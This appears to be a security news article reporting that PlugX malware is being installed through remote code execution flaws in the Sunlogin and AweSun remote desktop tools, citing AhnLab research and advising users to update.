System or software vulnerabilities reflect the ultimate opportunity for cybercriminals to act and deploy malware on the victim’s systems. We still didn’t get over the Log4Shell flaw that was exploited by numerous groups worldwide. Now, two new flaws are in the spotlight. This time around, operators of PlugX malware are preying on Sunlogin and AweSun users.
PlugX has been around for quite some time now, and it has recently targeted Windows users via fake Windows debugging tools. In this particular campaign, PlugX is back to target new remote desktop tools in hopes of taking full control of the victims’ devices.
When it comes to this malware family, victims should have a lot of questions to ask. How dangerous and risky are the vulnerabilities? Is it the China-based group Lucky Mouse? We’ll answer everything in the following article.
Remote Desktop Tools Compromised – PlugX Malware Strikes
As we mentioned, system vulnerabilities can cause a lot of damage, especially when they are found in critical tools such as remote desktop ones.
But when a cybercrime group such as Lucky Mouse is the one behind the attack, things can take a much more dangerous turn, as the China-based actors have had large-scale attacks in the past.
The group is well-known for utilizing HyperBro, PlugX, and SysUpdate malware families. But are they the ones behind this vulnerability exploitation?
According to AhnLab Security Emergency Response Center (ASEC), cybercriminals were able to use these vulnerabilities to deploy the following:
- Sliver post-exploitation framework
- XMRig cryptocurrency miner
- Gh0st RAT
- Paradise ransomware
PlugX is just the recent family to join the mix. Once it takes place on the device, the malware can easily take control of the entire system and harvest personal information. Here’s what the cybersecurity firm had to say about the current malware campaign:
“Sunlogin’s remote code execution vulnerability (CNVD-2022-10270 / CNVD-2022-03672) is still being used for attacks even now ever since its exploit code was disclosed.
AweSun is also a remote control program developed in China and, while its specific vulnerability has not been identified, it is presumed that a similar RCE vulnerability to that of Sunlogin had been disclosed.
The same threat actors performed an RCE vulnerability exploitation on both Sunlogin and AweSun to install Sliver C2.
A previous blog post has covered the cases that later occurred where similar vulnerability exploitations were used to install the Paradise ransomware.”
If the threat actors managed to successfully exploit the flaw, they can immediately execute a PowerShell command that retrieves an executable and a DLL file from a remote server.
“When the backdoor, PlugX, is installed, threat actors can gain control over the infected system without the knowledge of the user.”
Yes, this PlugX malware is dangerous and can cost users a lot in terms of data. Unfortunately, the security firm didn’t stop its research here.
Researchers did point out that PlugX is commonly used in China by one particular group. While it’s not disclosed, Lucky Mouse might have a hand in this.
New Vulnerabilities – A Backdoor to Maliciousness
PlugX malware has made its way to Chinese remote control programs Sunlogin and Awesun through new vulnerabilities.
Flaws are bound to be exploited. It’s up to the software company to patch them as soon as possible to avoid any malicious activities.
If you’re using these tools, make sure to download the latest updates. PlugX isn’t a malware variant you want lurking around within your systems.